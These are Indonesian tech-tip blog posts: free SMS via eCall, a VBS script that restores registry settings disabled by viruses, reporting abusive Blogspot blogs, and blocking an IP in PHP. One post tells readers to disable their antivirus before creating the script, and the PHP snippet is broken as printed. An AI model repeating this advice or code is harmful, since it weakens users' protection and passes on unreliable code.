3. Jika nomor ponsel tujuan anda belum tersedia pada address book, pilih langsung Direct entry oh number dan anda tuliskan nomor tujuan (untuk indonesia didahului dengan +62). MIsalnya jika nomor ponsel tujuan adalah 08561234567, maka nomor yang harus anda tuliskan adalah +628561234567. Jelas kan :)
4. Jika anda ingin menerima reply pesan lewat logbook eCall, pilih SMS reply via eCall pada pilihan Reply Option. Sebaliknya, jika anda memilih Reply to number maka pesan reply akan diterima di nomor ponsel yang anda isikan.
5. Anda dapat mengetahui notifikasi pesan SMS yang sudah diterima pada email jika anda sudah memilihnya pada kolom Confirmation of reception.
6. Jika ingin mengirim SMS dengan jenis flash, anda bisa juga memilihnya pada pilihan Flash SMS.
7. Ketikan pesan anda pada kotak My Message dan tekan Send untuk mengirimkannya.
Selamat Mencoba :D

Update :

Ada layanan sms buatan anak bangsa dari kusms.com proses pengiriman sms cepat dan ada fasilitas inboxnya. dan yang paling penting gratis. silakan di jajal. thanks :)
More aboutSMS Gratis Ke Nomor Apa Saja Termasuk Luar Negeri

Memulihkan Registry dengan VBS Akibat Virus

Posted by Kopenx Blog on Wednesday, January 7, 2009

Jika kita sering menggunakan computer, saya yakin kita udah nggak asing lagi dengan yang namanya virus… udah knalan kan dengannya… atau udah jadi sahabat baiknya nich, atau jangan-jangan komputernya lagi kena virus ya… emang sedikit menjengkelkan jika computer kita kena virus, ada yang filenya disembunyiin, mengganti format ekstensen file, menanyangkan kata-kata atau peringatan, dan lain sebagainya…

tetapi dari banyak kerja virus yang ada, kebanyakan virus selalu melakukan nonaktifkan terhadap perintah-perintah tertentu, ini digunakan agar file virus tadi tidak cepat hilang dan orang awam tentang computer dibuat kerepotan, kebanyakan diantaranya menu run dimatikan atau tidak keluar, registry tool dimatikan sehingga tidak bisa diakses, filenya dihidden, menu find tidak bisa digunakan, menu option yang terdapat pada Windows Explorer ditiadakan sehingga tidak bisa diakses, begitu juga dengan task manager… semua perintah-perintah itu sering kita gunakan bukan, dan sangat bermanfaat, tapi jika semua tidak bisa diakses, apa tidak bingung…

Oke.. kali ini kita akan sedikit bermain-main dengan salah satu bahasa pemrograman yang dikenal dengan istilah Visual Basic Script atau bahasa gaulnya VBS…

Script VBS ini hanya dibuat dengan menggunakan notepad yang sudah ada dalam Windows kamu (bagi yang pake Windows…) jadi nggak perlu bingung cari program bajakan lagi he… :) , script ini berguna untuk memulihkan kondisi registry, dintaranya yang dipulihkan : Menu Run, Registry Tool, File Hidden dapat terlihat, Menu Find, Menu Option dari Windows Explorer, dan Task Manager. Tapi harus diingat dan diperhatikan, kemungkinan besar script ini akan diblok oleh program anti virus karena dianggap musuh yang berbahaya, makanya sebelum membuat script ini matikan dulu antivirusnya…. :)

Ini script VBS nya, ketikkan dinotepad Anda :

On error resume next

Dim Reg

Set Reg = CreateObject(”WScript.Shell”)

if msgbox(”Kembalikan menu Run ?” , VbOkCancel) = VbOK then

Reg.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “0″, “REG_DWORD”

end if

if msgbox(”Enable Registry Tool ?” , VbOkCancel) = VbOK then

Reg.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “0″, “REG_DWORD”

end if

if msgbox(”Perlihatkan file hidden” , VbOkCancel) = VbOK then

Reg.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “1″, “REG_DWORD”

end if

if msgbox(”Kembalikan menu Find” , VbOkCancel) = VbOK then

Reg.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “0″, “REG_DWORD”

end if

if msgbox(”Kembalikan menu Option” , VbOkCancel) = VbOK then

Reg.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “0″, “REG_DWORD”

end if

if msgbox(”Enable Taskmanager” , VbOkCancel) = VbOK then

Reg.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “0″, “REG_DWORD”

end if

jika udah simpan dengan ekstensi vbs , jangan lupa itu… sebagai contoh: obatregistry.vbs

Thanks For akhario (wordpress)

More aboutMemulihkan Registry dengan VBS Akibat Virus

Cara Menutup blog yang bermasalah.

Posted by Kopenx Blog

Banyak sekali situs blog terutama di blogspot yang menyebarkan informasi mengenai kejelekan dan keburukan baik situs orang lain bahkan orangnya tersebut. Misalnya yang marak menjadi perdebatan di tahun 2008 kemarin nabi yang di kartunkan. Selain itu banyak juga dari antar blog dan blog lain saling menghina dan mengejek atau bahkan memfitnah. Untuk itu saya punya tips untuk memblokir atau menghapus situs blog yang memang dirasa dan terbukti bermasalah.

Cara menutup situs blogspot yang bermasalah :
  1. Buka Halaman Report a Terms of Service Violation pada blogspot atau klik link ini http://help.blogger.com/?page=troubleshooter.cs&problem=&contact_type=main_tos&Submit=Submit
  2. Pilih kategori Hate or Violance. Selanjutnya tekan continue, Tekan continue lagi.
  3. Masukan Alamat blog dalam kotak yang ingin dilaporkan. Misalnya http://contohblogbermasalah.blogspot.com.
  4. Tekan Submit.
Yang perlu diperhatikan adalah sesuaikan kategorinya dengan blog yang akan ditutup tersebut. Sebenarnya ada satah satu cara lain untuk menghapus blog orang lain, yaitu dengan cara menghacknya. tetapi disini tidak akan saya paparkan karena sangat berbahaya. bisa disalahgunakan. Karena banyak yang melaporkan, maka dengan cara diatas, blog tersebut bisa segera ditutup. Jika teman-teman tau blog yang bermasalah lainnya. bisa beritahu saya melalui kotak komentar. Nanti kita laporkan bareng-bareng langsung ke pemilik blogspot (google) agar segera ditutup.
More aboutCara Menutup blog yang bermasalah.

Trik Blokir Situs Dengan IP Address

Posted by Kopenx Blog

Di dunia internet tentunya tidak semua orang dapat dengan mudah dapat di percaya. Karena tidak bertatap muka langsung, maka kita harus extra hati-hati jika mengenal seseorang melalui internet. Begitu juga dengan pengunjung situs yang terus menerus mencoba bertindak 'nakal'. Dengan memanfaatkan teknologi internet yang seharusnya dapat mengangkat nama bangsa kita malah menjerumuskan nama bangsa sendiri.

Banyak situs di internet yang tidak mau menerima pembayaran kartu kredit dari orang Indonesia. Banyak situs yang tidak dapat dibuka dari negara tercinta kita ini. Banyak juga situs ecommerce milik luar negeri yang tidak melayani pembelian dari negara indonesia. Bagaimana hal itu bisa terjadi? Jawabannya adalah IP address yang kita gunakan. IP address yang digunakan membawa kode negara sendiri-sendiri. Dan Banyak tools di internet yang dapat mencar lokasi server hanya dengan menggunakan IP address saja.

Lalu Bagaimana memblokir IP dari indonesia? salah satunya yaitu dengan menggunakan script php, sebenarnya memblokir IP address itu sangat mudah. Yang harus anda ialah mendapatkan IP address, kemudian anda seleksi. Jika IP address tersebut merupakan IP yang sudah di blacklist (diblokir), tampilan pesan atau redirect ke situs lain. Untuk melakukannya, tambahkan script berikut ke dalam halaman utama web anda, bisa juga dimasukan ke dalam server lokal seperti warnet untuk memblokir situs-situs tertentu yang dilarang :

//$ip = $REMOTE_ADDR;
if ($ip=="127.0.0.1")
echo "IP $ip anda diblokir";
else
echo "IP Anda Tidak Di blokir";
?>//

Script di atas adalah untuk memblokir ip 127.0.0.1 (localhost). Anda dapat menggantinya dengan ip yang akan di blacklist. Atau menggunakan sistem database juga bisa. semuanya tergantung kreativitas anda. Selamat mencoba. Jika menemui kesulitan silakan di share disini saja. pasti saya jawab.
More aboutTrik Blokir Situs Dengan IP Address